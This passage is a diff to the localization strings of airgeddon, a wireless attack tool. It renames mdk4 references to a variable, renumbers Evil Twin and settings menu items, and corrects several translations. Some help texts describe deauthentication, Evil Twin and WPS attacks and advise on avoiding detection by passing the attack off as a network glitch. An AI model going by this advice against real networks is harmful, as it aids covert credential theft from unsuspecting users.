choisie (mode moniteur nécessaire)" + arr["CATALAN",35]="Seleccionat atac de Desautenticació / Dissociació ${mdk_command} (es requereix mode monitor)" + arr["PORTUGUESE",35]="Ataque de desautenticação com ${mdk_command} (modo monitor obrigatório)" + arr["RUSSIAN",35]="Выбрана ${mdk_command} атака Деаутентификации / Разъединения (необходим режим монитора)" + arr["GREEK",35]="Deauthentication / Έχει επιλεχθεί επίθεση dissasociation ${mdk_command} (χρειάζεται η κατάσταση παρακολούθησης)" + arr["ITALIAN",35]="Attacco Deauth / Disassociation ${mdk_command} scelto (modalità monitor richiesta)" + arr["POLISH",35]="Wybrano atak Deauthentication / Disassociation ${mdk_command} (wymagany tryb monitorowania)" + arr["GERMAN",35]="Deauthentication / Disassociation ${mdk_command} Angriff ausgewählt (monitor-Modus erforderlich)" + arr["TURKISH",35]="Deauthentication / Dissasociation ${mdk_command} saldırısı seçildi (izleme modu gereklidir)" arr["ENGLISH",36]="Deauthentication aireplay attack chosen (monitor mode needed)" arr["SPANISH",36]="Elegido ataque de Desautenticación aireplay (modo monitor requerido)" @@ -1461,17 +1465,17 @@ function language_strings() { arr["GERMAN",50]="monitor-Modus bei Angriffen erforderlich" arr["TURKISH",50]="saldırılar için izleme modu gereklidir" - arr["ENGLISH",51]="5. Deauth / disassoc amok mdk4 attack" - arr["SPANISH",51]="5. Ataque Deauth / Disassoc amok mdk4" - arr["FRENCH",51]="5. Attaque Deauth / Disassoc amok mdk4" - arr["CATALAN",51]="5. Atac Deauth / Disassoc amok mdk4" - arr["PORTUGUESE",51]="5. Ataque Deauth / Disassoc amok mdk4" - arr["RUSSIAN",51]="5. Атака деаутентификации / разъединения amok mdk4" - arr["GREEK",51]="5. Επίθεση Deauth / Disassoc amok mdk4" - arr["ITALIAN",51]="5. Attacco Deauth / Disassoc amok mdk4" - arr["POLISH",51]="5. Atak Deauth / Disassoc amok mdk4" - arr["GERMAN",51]="5. Deauth / Disassoc Amok mdk4 Angriff" - arr["TURKISH",51]="5. Deauth / disassoc amok mdk4 saldırısı" + arr["ENGLISH",51]="5. Deauth / disassoc amok ${mdk_command} attack" + arr["SPANISH",51]="5. Ataque Deauth / Disassoc amok ${mdk_command}" + arr["FRENCH",51]="5. Attaque Deauth / Disassoc amok ${mdk_command}" + arr["CATALAN",51]="5. Atac Deauth / Disassoc amok ${mdk_command}" + arr["PORTUGUESE",51]="5. Ataque Deauth / Disassoc amok ${mdk_command}" + arr["RUSSIAN",51]="5. Атака деаутентификации / разъединения amok ${mdk_command}" + arr["GREEK",51]="5. Επίθεση Deauth / Disassoc amok ${mdk_command}" + arr["ITALIAN",51]="5. Attacco Deauth / Disassoc amok ${mdk_command}" + arr["POLISH",51]="5. Atak Deauth / Disassoc amok ${mdk_command}" + arr["GERMAN",51]="5. Deauth / Disassoc Amok ${mdk_command} Angriff" + arr["TURKISH",51]="5. Deauth / disassoc amok ${mdk_command} saldırısı" arr["ENGLISH",52]="6. Deauth aireplay attack" arr["SPANISH",52]="6. Ataque Deauth aireplay" @@ -1868,7 +1872,7 @@ function language_strings() { arr["ITALIAN",84]="Menu dell'attacco Enterprise" arr["POLISH",84]="Menu ataków Enterprise" arr["GERMAN",84]="Enterprise-Angriffsmenü" - arr["TURKISH",84]="${pending_of_translation} Enterprise saldırılar menüsü" + arr["TURKISH",84]="Enterprise saldırı menüsü" arr["ENGLISH",85]="Send me bugs or suggestions to ${normal_color}${mail}" arr["SPANISH",85]="Enviadme errores o sugerencias a ${normal_color}${mail}" @@ -1918,17 +1922,17 @@ function language_strings() { arr["GERMAN",88]="Interface-Auswahl" arr["TURKISH",88]="Arayüz seçimi" - arr["ENGLISH",89]="Mdk4 amok action" - arr["SPANISH",89]="Acción mdk4 amok" - arr["FRENCH",89]="Action mdk4 amok" - arr["CATALAN",89]="Acció mdk4 amok" - arr["PORTUGUESE",89]="Ação mdk4 amok" - arr["RUSSIAN",89]="Mdk4 amok в действии" - arr["GREEK",89]="Ενέργεια mdk4 amok" - arr["ITALIAN",89]="Azione mdk4 amok" - arr["POLISH",89]="Akcja mdk4 amok" - arr["GERMAN",89]="mdk4 amok Aktion" - arr["TURKISH",89]="Mdk4 amok etkisi" + arr["ENGLISH",89]="${mdk_command} amok action" + arr["SPANISH",89]="Acción ${mdk_command} amok" + arr["FRENCH",89]="Action ${mdk_command} amok" + arr["CATALAN",89]="Acció ${mdk_command} amok" + arr["PORTUGUESE",89]="Ação ${mdk_command} amok" + arr["RUSSIAN",89]="${mdk_command} amok в действии" + arr["GREEK",89]="Ενέργεια ${mdk_command} amok" + arr["ITALIAN",89]="Azione ${mdk_command} amok" + arr["POLISH",89]="Akcja ${mdk_command} amok" + arr["GERMAN",89]="${mdk_command} amok Aktion" + arr["TURKISH",89]="${mdk_command} amok etkisi" arr["ENGLISH",90]="Aireplay deauth action" arr["SPANISH",90]="Acción aireplay deauth" @@ -1990,17 +1994,17 @@ function language_strings() { arr["GERMAN",94]="Michael Shutdown Aktion" arr["TURKISH",94]="Michael Shutdown etkisi" - arr["ENGLISH",95]="Mdk4 amok parameters" - arr["SPANISH",95]="Parámetros Mdk4 amok" - arr["FRENCH",95]="Paramètres Mdk4 amok" - arr["CATALAN",95]="Paràmetres Mdk4 amok" - arr["PORTUGUESE",95]="Parâmetros Mdk4 amok" - arr["RUSSIAN",95]="Параметры Mdk4 amok" - arr["GREEK",95]="Παράμετροι Mdk4 amok" - arr["ITALIAN",95]="Parametri Mdk4 amok" - arr["POLISH",95]="Parametry Mdk4 amok" - arr["GERMAN",95]="Mdk4 amok Parameter" - arr["TURKISH",95]="Mdk4 amok parametreleri" + arr["ENGLISH",95]="${mdk_command} amok parameters" + arr["SPANISH",95]="Parámetros ${mdk_command} amok" + arr["FRENCH",95]="Paramètres ${mdk_command} amok" + arr["CATALAN",95]="Paràmetres ${mdk_command} amok" + arr["PORTUGUESE",95]="Parâmetros ${mdk_command} amok" + arr["RUSSIAN",95]="Параметры ${mdk_command} amok" + arr["GREEK",95]="Παράμετροι ${mdk_command} amok" + arr["ITALIAN",95]="Parametri ${mdk_command} amok" + arr["POLISH",95]="Parametry ${mdk_command} amok" + arr["GERMAN",95]="${mdk_command} amok Parameter" + arr["TURKISH",95]="${mdk_command} amok parametreleri" arr["ENGLISH",96]="Aireplay deauth parameters" arr["SPANISH",96]="Parámetros Aireplay deauth" @@ -2259,7 +2263,7 @@ function language_strings() { arr["FRENCH",117]="mode silencieux, déconnecter après la capture" arr["CATALAN",117]="mode smooth, desconnectar després de capturar" arr["PORTUGUESE",117]="modo discreto, finaliza após uma captura" - arr["RUSSIAN",117]="smooth режим (отключить атаку как только захвачены данные)" + arr["RUSSIAN",117]="smooth режим, отключить атаку как только захвачены данные," arr["GREEK",117]="smooth mode, αποσυνδέστε τη συσκευή μετά τη λήψη" arr["ITALIAN",117]="modalità smooth, disconnettersi dopo la cattura" arr["POLISH",117]="tryb smooth, odłącz po przechwyceniu" @@ -2518,17 +2522,17 @@ function language_strings() { arr["GERMAN",138]="Handshake-Angriff" arr["TURKISH",138]="Saldırı için Handshake" - arr["ENGLISH",139]="1. Deauth / disassoc amok mdk4 attack" - arr["SPANISH",139]="1. Ataque Deauth / Disassoc amok mdk4" - arr["FRENCH",139]="1. Attaque Deauth / Disassoc amok mdk4" - arr["CATALAN",139]="1. Atac Deauth / Disassoc amok mdk4" - arr["PORTUGUESE",139]="1. Ataque Deauth / Disassoc amok mdk4" - arr["RUSSIAN",139]="1. Атака деаутентификации / разъединения amok mdk4" - arr["GREEK",139]="1. Επίθεση Deauth / disassoc amok mdk4" - arr["ITALIAN",139]="1. Attacco Deauth / Disassoc amok mdk4" - arr["POLISH",139]="1. Atak Deauth / Disassoc amok mdk4" - arr["GERMAN",139]="1. Deauth / Disassoc Amok mdk4 Angriff" - arr["TURKISH",139]="1. Deauth / disassoc amok mdk4 saldırısı" + arr["ENGLISH",139]="1. Deauth / disassoc amok ${mdk_command} attack" + arr["SPANISH",139]="1. Ataque Deauth / Disassoc amok ${mdk_command}" + arr["FRENCH",139]="1. Attaque Deauth / Disassoc amok ${mdk_command}" + arr["CATALAN",139]="1. Atac Deauth / Disassoc amok ${mdk_command}" + arr["PORTUGUESE",139]="1. Ataque Deauth / Disassoc amok ${mdk_command}" + arr["RUSSIAN",139]="1. Атака деаутентификации / разъединения amok ${mdk_command}" + arr["GREEK",139]="1. Επίθεση Deauth / disassoc amok ${mdk_command}" + arr["ITALIAN",139]="1. Attacco Deauth / Disassoc amok ${mdk_command}" + arr["POLISH",139]="1. Atak Deauth / Disassoc amok ${mdk_command}" + arr["GERMAN",139]="1. Deauth / Disassoc Amok ${mdk_command} Angriff" + arr["TURKISH",139]="1. Deauth / disassoc amok ${mdk_command} saldırısı" arr["ENGLISH",140]="2. Deauth aireplay attack" arr["SPANISH",140]="2. Ataque Deauth aireplay" @@ -2561,7 +2565,7 @@ function language_strings() { arr["PORTUGUESE",142]="Se o Handshake não aparecer após um ataque, tente novamente ou tente alterar o tipo de ataque" arr["RUSSIAN",142]="Если рукопожатие не появилось после атаки, попробуйте снова или измените тип атаки" arr["GREEK",142]="Αν η Χειραψία δεν εμφανιστεί μετά από την επίθεση, προσπαθήστε ξανά ή αλλάξτε τύπο επίθεσης" - arr["ITALIAN",142]=" Se dopo un attacco non compare l'Handshake, prova di nuovo o cambia attacco fino ad ottenerlo" + arr["ITALIAN",142]="Se dopo un attacco non compare l'Handshake, prova di nuovo o cambia attacco fino ad ottenerlo" arr["POLISH",142]="Jeśli po ataku nie pojawi się Handshake, spróbuj ponownie lub zmień atak" arr["GERMAN",142]="Wenn nach einem Angriff der Handshake nicht erscheint, versuchen Sie es erneut oder ändern Sie den Angriff, bis Sie ihn erhalten" arr["TURKISH",142]="Eğer handshake başarısız olduysa, başka bir saldırı yöntemi deneyin" @@ -3970,17 +3974,17 @@ function language_strings() { arr["GERMAN",259]="6. Evil Twin AP Angriff mit Sniffing" arr["TURKISH",259]="6. Şeytani İkiz AP Saldırısı sniffing ile birlikte" - arr["ENGLISH",260]="5. Smooth mode Enterprise Evil Twin" - arr["SPANISH",260]="5. Evil Twin Enterprise modo smooth" - arr["FRENCH",260]="5. Evil Twin Enterprise mode silencieux" - arr["CATALAN",260]="5. Evil Twin Enterprise mode smooth" - arr["PORTUGUESE",260]="5. Evil Twin Enterprise (discreto)" - arr["RUSSIAN",260]="5. Smooth режим Enterprise Evil Twin" - arr["GREEK",260]="5. Smooth mode Enterprise Evil Twin" - arr["ITALIAN",260]="5. Evil Twin Enterprise modalità smooth" - arr["POLISH",260]="5. Enterprise Evil Twin w trybie smooth" - arr["GERMAN",260]="5. Smooth-Modus Enterprise Evil Twin" - arr["TURKISH",260]="5. Smooth mod Enterprise Evil Twin" + arr["ENGLISH",260]="6. Smooth mode Enterprise Evil Twin" + arr["SPANISH",260]="6. Evil Twin Enterprise modo smooth" + arr["FRENCH",260]="6. Evil Twin Enterprise mode silencieux" + arr["CATALAN",260]="6. Evil Twin Enterprise mode smooth" + arr["PORTUGUESE",260]="6. Evil Twin Enterprise (discreto)" + arr["RUSSIAN",260]="6. Smooth режим Enterprise Evil Twin" + arr["GREEK",260]="6. Smooth mode Enterprise Evil Twin" + arr["ITALIAN",260]="6. Evil Twin Enterprise modalità smooth" + arr["POLISH",260]="6. Enterprise Evil Twin w trybie smooth" + arr["GERMAN",260]="6. Smooth-Modus Enterprise Evil Twin" + arr["TURKISH",260]="6. Smooth mod Enterprise Evil Twin" arr["ENGLISH",261]="7. Evil Twin AP attack with sniffing and sslstrip" arr["SPANISH",261]="7. Ataque Evil Twin AP con sniffing y sslstrip" @@ -4534,17 +4538,17 @@ function language_strings() { arr["GERMAN",306]="Der Sniffer hat Passwörter erfasst. Datei in ${normal_color}[${ettercap_logpath}] ${blue_color}gespeichert" arr["TURKISH",306]="Parolalar sniffer tarafından yakalandı. Şu dosyaya kaydedildi ${normal_color}[${ettercap_logpath}]" - arr["ENGLISH",307]="6. Noisy mode Enterprise Evil Twin" - arr["SPANISH",307]="6. Evil Twin Enterprise modo noisy" - arr["FRENCH",307]="6. Evil Twin Enterprise mode bruyant" - arr["CATALAN",307]="6. Evil Twin Enterprise mode noisy" - arr["PORTUGUESE",307]="6. Evil Twin Enterprise (agressivo)" - arr["RUSSIAN",307]="6. Noisy режим Enterprise Evil Twin" - arr["GREEK",307]="6. Noisy mode Enterprise Evil Twin" - arr["ITALIAN",307]="6. Evil Twin Enterprise modalità noisy" - arr["POLISH",307]="6. Enterprise Evil Twin w trybie noisy" - arr["GERMAN",307]="6. Noisy-Modus Enterprise Evil Twin" - arr["TURKISH",307]="6. Noisy mod Enterprise Evil Twin" + arr["ENGLISH",307]="7. Noisy mode Enterprise Evil Twin" + arr["SPANISH",307]="7. Evil Twin Enterprise modo noisy" + arr["FRENCH",307]="7. Evil Twin Enterprise mode bruyant" + arr["CATALAN",307]="7. Evil Twin Enterprise mode noisy" + arr["PORTUGUESE",307]="7. Evil Twin Enterprise (agressivo)" + arr["RUSSIAN",307]="7. Noisy режим Enterprise Evil Twin" + arr["GREEK",307]="7. Noisy mode Enterprise Evil Twin" + arr["ITALIAN",307]="7. Evil Twin Enterprise modalità noisy" + arr["POLISH",307]="7. Enterprise Evil Twin w trybie noisy" + arr["GERMAN",307]="7. Noisy-Modus Enterprise Evil Twin" + arr["TURKISH",307]="7. Noisy mod Enterprise Evil Twin" arr["ENGLISH",308]="6. Russian" arr["SPANISH",308]="6. Ruso" @@ -4836,7 +4840,7 @@ function language_strings() { arr["ENGLISH",332]="Before launching an attack against an Enterprise network, bear in mind that \"noisy\" mode will cause legitimate clients stuck trying to authenticate over and over again on the fake network. This could raise suspicions and you could be easily discovered" arr["SPANISH",332]="Antes de lanzar un ataque contra una red Enterprise, ten en cuenta que el modo \"noisy\" dejará a los clientes legítimos atrapados intentando autenticarse una y otra vez contra la red falsa. Esto podría levantar sospechas y podrías ser descubierto fácilmente" - arr["FRENCH",332]="Avant d'efectuer une attaque contre un réseau d'entreprise, gardez à l'esprit que le mode \"noisy\" faira des clients légitimes piégés en s'authentifier encore et encore contre le faux réseau. Ça pourrait susciter des soupçons et pourrait être facilement découvert" + arr["FRENCH",332]="Avant d'efectuer une attaque contre un réseau entreprise, gardez à l'esprit que le mode \"noisy\" faira des clients légitimes piégés en s'authentifier encore et encore contre le faux réseau. Ça pourrait susciter des soupçons et pourrait être facilement découvert" arr["CATALAN",332]="Abans de llançar un atac contra una xarxa Enterprise, tingues en compte que el mode \"noisy\" deixarà als clients legítims atrapats intentant autenticar una vegada i un altra contra la xarxa falsa. Això podria aixecar sospites i podries ser descobert fàcilment" arr["PORTUGUESE",332]="Antes de iniciar um ataque contra uma rede Enterprise, lembre-se de que o \"modo agressivo\" fará com que os clientes legítimos falhem repetidas vezes ao se autenticar com a rede falsa. Isso pode levantar suspeitas e o ataque pode ser facilmente descoberto" arr["RUSSIAN",332]="Прежде чем приступать к атаке на корпоративную сеть, имейте в виду, что режим \"noisy\" приведёт к тому, что законные клиенты будут пытаться аутентифицироваться снова и снова в поддельной сети. Это может вызвать подозрения, и вас можно легко обнаружить" @@ -4844,7 +4848,7 @@ function language_strings() { arr["ITALIAN",332]="Prima di lanciare un attacco contro una rete Enterpise, tieni presente che la modalità \"noisy\" lascierá i clienti legittimi intrappolati cercando di eseguire ripetutamente l'autenticazione contro la rete falsa. Questo potrebbe sollevare sospetti e potrebbe essere facilmente scoperto" arr["POLISH",332]="Przed rozpoczęciem ataku na sieć Enterprise należy pamiętać, że tryb \"noisy\" uniemożliwi legalnym klientom próbę ponownego uwierzytelnienia się w fałszywej sieci. Może to wzbudzić podejrzenia i jest łatwe do wykrycia" arr["GERMAN",332]="Beachten Sie vor dem Starten eines Angriffs auf ein Enterprise-Netzwerk, dass der \"noisy\" Modus legitime Clients daran hindert, sich immer wieder gegen das gefälschte Netzwerk zu authentifizieren. Dies könnte zu Misstrauen führen und könnte leicht entdeckt werden" - arr["TURKISH",332]="${pending_of_translation} Bir Kurumsal ağa karşı bir saldırı başlatmadan önce, \"noisy\" modun meşru istemcilerin sahte ağa karşı tekrar ve tekrar kimlik doğrulamaya çalışmasını engelleyeceğini unutmayın. Bu şüpheleri artırabilir ve kolayca keşfedilebilir" + arr["TURKISH",332]="Kurumsal bir ağa karşı saldırı başlatmadan önce, \"noisy\" modun meşru istemcilerin sahte ağa karşı tekrar ve tekrar kimlik doğrulamaya çalışacağını unutmayın. Bu şüpheli gözükebilir ve kolayca keşfedilebilir" arr["ENGLISH",333]="8. WPS attacks menu" arr["SPANISH",333]="8. Menú de ataques WPS" @@ -6032,7 +6036,7 @@ function language_strings() { arr["ITALIAN",431]="Il protocollo WEP fú disegnato male e si puó rompere in pochi minuti se si genera abbastanza traffico" arr["POLISH",431]="Protokół WEP został nieprawidłowo zaprojektowany i może zostać złamany po kilku minutach, jeśli zostanie wygenerowany wystarczający ruch" arr["GERMAN",431]="Das WEP-Protokoll hatte ein falsches Design und kann in wenigen Minuten unterbrochen werden, wenn genügend Datenverkehr generiert wird" - arr["TURKISH",431]="WEP protokolü kötü bir tasarıma sahipti ve yeterli trafik oluşturulması durumunda bir kaç dakika içinde kırılabilir." + arr["TURKISH",431]="WEP protokolü kötü bir tasarıma sahipti ve yeterli trafik oluşturulması durumunda bir kaç dakika içinde kırılabilir" arr["ENGLISH",432]="Captured IVs (Initialization Vectors) are shown on airodump capture window as \"Data\"" arr["SPANISH",432]="Los IVs (Vectores de Inicialización) capturados, son representados en la ventana de captura de airodump como \"Data\"" @@ -6214,17 +6218,17 @@ function language_strings() { arr["GERMAN",446]="0. Zum Optionsmenü zurückkehren" arr["TURKISH",446]="0. Ayarlar menüsüne geri dön" - arr["ENGLISH",447]="11. Set permanently airgeddon's language to the current one" - arr["SPANISH",447]="11. Cambiar permanentemente el idioma de airgeddon al actual" - arr["FRENCH",447]="11. Etablir comme langue permanente d'airgeddon celle utilisée actuellement" - arr["CATALAN",447]="11. Canviar permanentment l'idioma de airgeddon a l'actual" - arr["PORTUGUESE",447]="11. Alterar permanentemente o idioma do airgeddon para o atual" - arr["RUSSIAN",447]="11. Сделать текущий язык airgeddon постоянным" - arr["GREEK",447]="11. Θέστε μόνιμα την τρέχουσα γλώσσα του airgeddon ως προεπιλεγμένη" - arr["ITALIAN",447]="11. Modificare in modo permanente la lingua di airgeddon a quella attuale" - arr["POLISH",447]="11. Trwale ustaw język airgeddon na aktualny" - arr["GERMAN",447]="11. Ändern Sie dauerhaft die Sprache von airgeddon zur aktuellen Sprache" - arr["TURKISH",447]="11. Sürekli olarak airgeddon'un dilini geçerli olana ayarla" + arr["ENGLISH",447]="12. Set permanently airgeddon's language to the current one" + arr["SPANISH",447]="12. Cambiar permanentemente el idioma de airgeddon al actual" + arr["FRENCH",447]="12. Etablir comme langue permanente d'airgeddon celle utilisée actuellement" + arr["CATALAN",447]="12. Canviar permanentment l'idioma de airgeddon a l'actual" + arr["PORTUGUESE",447]="12. Alterar permanentemente o idioma do airgeddon para o atual" + arr["RUSSIAN",447]="12. Сделать текущий язык airgeddon постоянным" + arr["GREEK",447]="12. Θέστε μόνιμα την τρέχουσα γλώσσα του airgeddon ως προεπιλεγμένη" + arr["ITALIAN",447]="12. Modificare in modo permanente la lingua di airgeddon a quella attuale" + arr["POLISH",447]="12. Trwale ustaw język airgeddon na aktualny" + arr["GERMAN",447]="12. Ändern Sie dauerhaft die Sprache von airgeddon zur aktuellen Sprache" + arr["TURKISH",447]="12. Sürekli olarak airgeddon'un dilini geçerli olana ayarla" arr["ENGLISH",448]="If you installed airgeddon from a repository, you should not enable automatic updates. airgeddon will be updated when there is a new version in the repository" arr["SPANISH",448]="Si instalaste airgeddon desde un repositorio, no deberías activar la actualización automática. airgeddon se actualizará cuando haya una nueva versión en el repositorio" @@ -6260,7 +6264,7 @@ function language_strings() { arr["ITALIAN",450]="5. Attivare permanentemente la colorazione estesa" arr["POLISH",450]="5. Trwale włącz rozszerzone kolorowanie" arr["GERMAN",450]="5. Die erweiterte Einfärbung dauerhaft aktivieren" - arr["TURKISH",450]="5. Genişletilmiş renklendirmeyi kalıcı olarak etkinleştir" + arr["TURKISH",450]="5. Geliştirilmiş renklendirmeyi kalıcı olarak etkinleştir" arr["ENGLISH",451]="Automatic updates: ${pink_color}Enabled${normal_color}" arr["SPANISH",451]="Actualizaciones automáticas: ${pink_color}Activadas${normal_color}" @@ -6296,7 +6300,7 @@ function language_strings() { arr["ITALIAN",453]="Colorazione estesa: ${pink_color}Attivata${normal_color}" arr["POLISH",453]="Rozszerzone kolorowanie: ${pink_color}Włączone${normal_color}" arr["GERMAN",453]="Erweiterte Einfärbung: ${pink_color}Aktiviert${normal_color}" - arr["TURKISH",453]="Genişletilmiş renklendirme: ${pink_color}Etkin${normal_color}" + arr["TURKISH",453]="Geliştirilmiş renklendirme: ${pink_color}Etkin${normal_color}" arr["ENGLISH",454]="Extended colorization: ${pink_color}Disabled${normal_color}" arr["SPANISH",454]="Colorización extendida: ${pink_color}Desactivada${normal_color}" @@ -6308,7 +6312,7 @@ function language_strings() { arr["ITALIAN",454]="Colorazione estesa: ${pink_color}Disattivata${normal_color}" arr["POLISH",454]="Rozszerzone kolorowanie: ${pink_color}Wyłączone${normal_color}" arr["GERMAN",454]="Erweiterte Einfärbung: ${pink_color}Deaktiviert${normal_color}" - arr["TURKISH",454]="Genişletilmiş renklendirme: ${pink_color}DevreDışı${normal_color}" + arr["TURKISH",454]="Geliştirilmiş renklendirme: ${pink_color}DevreDışı${normal_color}" arr["ENGLISH",455]="2. Disable automatic updates permanently" arr["SPANISH",455]="2. Deshabilitar permanentemente la actualización automática" @@ -6332,7 +6336,7 @@ function language_strings() { arr["ITALIAN",456]="5. Disattivare permanentemente la colorazione estesa" arr["POLISH",456]="5. Trwale wyłącz rozszerzone kolorowanie" arr["GERMAN",456]="5. Erweiterte Einfärbung dauerhaft deaktivieren" - arr["TURKISH",456]="5. Genişletilmiş renklendirmeyi kalıcı olarak devre dışı bırak" + arr["TURKISH",456]="5. Geliştirilmiş renklendirmeyi kalıcı olarak devre dışı bırak" arr["ENGLISH",457]="${blue_color}Automatic updates are going to be disabled. ${green_color}Do you want to continue? ${normal_color}${visual_choice}" arr["SPANISH",457]="${blue_color}Se van a desactivar las actualizaciones automáticas. ${green_color}¿Deseas continuar? ${normal_color}${visual_choice}" @@ -6404,7 +6408,7 @@ function language_strings() { arr["ITALIAN",462]="${blue_color}La colorazione estesa sará disattivata. ${green_color}Vuoi continuare? ${normal_color}${visual_choice}" arr["POLISH",462]="${blue_color}Rozszerzone kolorowanie zostanie wyłączone. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" arr["GERMAN",462]="${blue_color}Erweiterte Einfärbung wird deaktiviert. ${green_color}Möchten Sie fortfahren? ${normal_color}${visual_choice}" - arr["TURKISH",462]="${pending_of_translation} ${blue_color}Genişletilmiş renklendirme devre dışı bırakılacak. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" + arr["TURKISH",462]="${blue_color}Geliştirilmiş renklendirme devre dışı bırakılacak. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" arr["ENGLISH",463]="${blue_color}Extended colorization is going to be enabled. ${green_color}Do you want to continue? ${normal_color}${visual_choice}" arr["SPANISH",463]="${blue_color}Se va a activar la colorización extendida. ${green_color}¿Deseas continuar? ${normal_color}${visual_choice}" @@ -6416,7 +6420,7 @@ function language_strings() { arr["ITALIAN",463]="${blue_color}La colorazione estesa sará attivata. ${green_color}Vuoi continuare? ${normal_color}${visual_choice}" arr["POLISH",463]="${blue_color}Rozszerzone kolorowanie zostanie włączone. ${green_color}Czy chcesz kontynuować? ${normal_color}${visual_choice}" arr["GERMAN",463]="${blue_color}Erweiterte Einfärbung wird aktiviert. ${green_color}Wollen Sie fortfahren? ${normal_color}${visual_choice}" - arr["TURKISH",463]="Genişletilmiş renklendirme etkinleştirilecektir. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" + arr["TURKISH",463]="${blue_color}Geliştirilmiş renklendirme etkinleştirilecektir. ${green_color}Devam etmek istiyor musunuz? ${normal_color}${visual_choice}" arr["ENGLISH",464]="You don't have the ccze package installed so any change on this option will have no effect until you install it" arr["SPANISH",464]="No tienes instalado el paquete ccze por lo que cualquier cambio que realices sobre esta opción no tendrá efecto hasta que lo instales" @@ -6440,7 +6444,7 @@ function language_strings() { arr["ITALIAN",465]="La colorazione estesa è stata attivata" arr["POLISH",465]="Rozszerzone kolorowanie zostało aktywowane" arr["GERMAN",465]="Erweiterte Einfärbung wurde aktiviert" - arr["TURKISH",465]="Genişletilmiş renklendirme etkinleştirildi" + arr["TURKISH",465]="Geliştirilmiş renklendirme etkinleştirildi" arr["ENGLISH",466]="Extended colorization has been disabled" arr["SPANISH",466]="Se ha desactivado la colorización extendida" @@ -6452,7 +6456,7 @@ function language_strings() { arr["ITALIAN",466]="La colorazione estesa è stata disattivata" arr["POLISH",466]="Rozszerzone kolorowanie zostało wyłączone" arr["GERMAN",466]="Erweiterte Einfärbung wurde deaktiviert" - arr["TURKISH",466]="Genişletilmiş renklendirme devre dışı bırakıldı" + arr["TURKISH",466]="Geliştirilmiş renklendirme devre dışı bırakıldı" arr["ENGLISH",467]="6. Enable startup language autodetection permanently" arr["SPANISH",467]="6. Habilitar permanentemente la autodetección de idioma al inicio" @@ -6655,8 +6659,8 @@ function language_strings() { arr["GREEK",483]="Η επίθεση σε \"smooth\" mode θα σπάσει σε διάφορα μέρη μόλις ληφθεί η πιστοποίηση για να επιτρέψει στους πελάτες να επανασυνδεθούν ξανά στο κανονικό δίκτυο. Αυτό μειώνει την πιθανότητα να ανακαλυφθεί, αναζητώντας ορισμένους χρήστες ως μια εσφαλμένη λειτουργία ασύρματου δικτύου" arr["ITALIAN",483]="L'attacco con la modalità \"smooth\" non appena acquisisce una credenziale verrà fermato per consentire ai client di riconnettersi alla rete legittima. Questo riduce le possibilità di essere scoperti, facendo credere agli utenti che sia stato un errore della rete wireless" arr["POLISH",483]="Atak w trybie \"smooth\" zostanie zdemontowany zaraz po przechwyceniu danych, aby umożliwić klientom ponowne połączenie z właściwą siecią. Zmniejsza to szansę na wykrycie, ponieważ niektórym użytkownikom wydaje się że to chwilowa awaria sieci bezprzewodowej" - arr["GERMAN",483]="Der Angriff im \"smooth\"-Modus wird sobald er einen Berechtigungsnachweis erfasst abgebaut, damit die Clients sich wieder mit dem legitimen Netzwerk verbinden können. Dies verringert die Wahrscheinlichkeit, entdeckt zu werden, was für einige Benutzer als sinnloser Ausfall des WLANs erscheint." - arr["TURKISH",483]="${pending_of_translation} Bir kimlik bilgilerini yakalar yakalamaz modda \"smooth\" saldırı, istemcilerin meşru ağa yeniden bağlanmasına izin vermek için sökülecektir. Bu, keşfedilme şansını azaltır ve bazı kullanıcılar için kablosuz ağın anlamsız bir başarısızlığı gibi görünmesini sağlar" + arr["GERMAN",483]="Der Angriff im \"smooth\"-Modus wird sobald er einen Berechtigungsnachweis erfasst abgebaut, damit die Clients sich wieder mit dem legitimen Netzwerk verbinden können. Dies verringert die Wahrscheinlichkeit, entdeckt zu werden, was für einige Benutzer als sinnloser Ausfall des WLANs erscheint" + arr["TURKISH",483]="\"smooth\" saldırı modu, herhangi bir giriş bilgisi yakalanır yakalanmaz, istemcilerin meşru ağa yeniden bağlanmasına izin vermek için durdurulacaktır. Bu, keşfedilme şansını azaltır ve bazı kullanıcılar için kablosuz ağın anlamsız bir başarısızlığı gibi görünmesini sağlar" arr["ENGLISH",484]="Root permissions successfully detected" arr["SPANISH",484]="Permisos de root correctamente detectados" @@ -6764,7 +6768,7 @@ function language_strings() { arr["ITALIAN",492]="L'algoritmo Arcadyan non può essere calcolato. Anche se hai scelto l'opzione di attacco con bully, per calcolare quel PIN che devi usare wash (incluso nel pacchetto reaver) e non l'hai installato. Lo script continuerà l'attacco senza includerlo" arr["POLISH",492]="Nie można obliczyć algorytmu Arcadyan. Chociaż wybrano opcję ataku za pomocą bully, aby obliczyć ten kod PIN, musisz użyć wash (dołączonego do pakietu reaver) i nie masz go zainstalowanego. Skrypt będzie kontynuował atak bez jego włączania" arr["GERMAN",492]="Der Arcadyan-Algorithmus kann nicht berechnet werden. Obwohl Sie den bully-Angriff gewählt haben, müssen Sie zur Berechnung dieser PIN die Funktion wash verwenden (im Paket reaver enthalten), und Sie haben sie nicht installiert. Das Skript setzt den Angriff fort, ohne es einzuschließen" - arr["TURKISH",492]="${pending_of_translation} Arcadyan algoritması hesaplanamadı. Saldırı için zorlama seçeneğini seçmiş olmanıza rağmen, bu PIN'i hesaplamak için yıkama kullanmanız (reaktif paketine dahil) ve onu yüklememeniz gerekir. Komut dahil etmeden saldırıya devam edecek" + arr["TURKISH",492]="Arcadyan algoritması hesaplanamadı. Saldırı için zorlama seçeneğini seçmiş olmanıza rağmen, bu PIN'i hesaplamak için wash kullanmanız (reaver paketine dahil) ve onu yüklememeniz gerekir. Bu kullanılmadan devam edilecek" arr["ENGLISH",493]="The Arcadyan algorithm PIN has already been calculated for this target (${normal_color}${wps_data_array[${wps_bssid},'Arcadyan']}${yellow_color}). There is no need to calculate it again" arr["SPANISH",493]="El PIN del algoritmo Arcadyan ya fue calculado para este objetivo (${normal_color}${wps_data_array[${wps_bssid},'Arcadyan']}${yellow_color}). No hace falta calcularlo de nuevo" @@ -6906,9 +6910,9 @@ function language_strings() { arr["RUSSIAN",504]="${blue_color}Этот процесс расчета PIN-кода не является чисто офлайн. От целевой точки доступа требуется полный запрос \"probe\" для получения необходимых данных. ${green_color}Вы хотите продолжить? ${normal_color}${visual_choice}" arr["GREEK",504]="${blue_color}Αυτή η 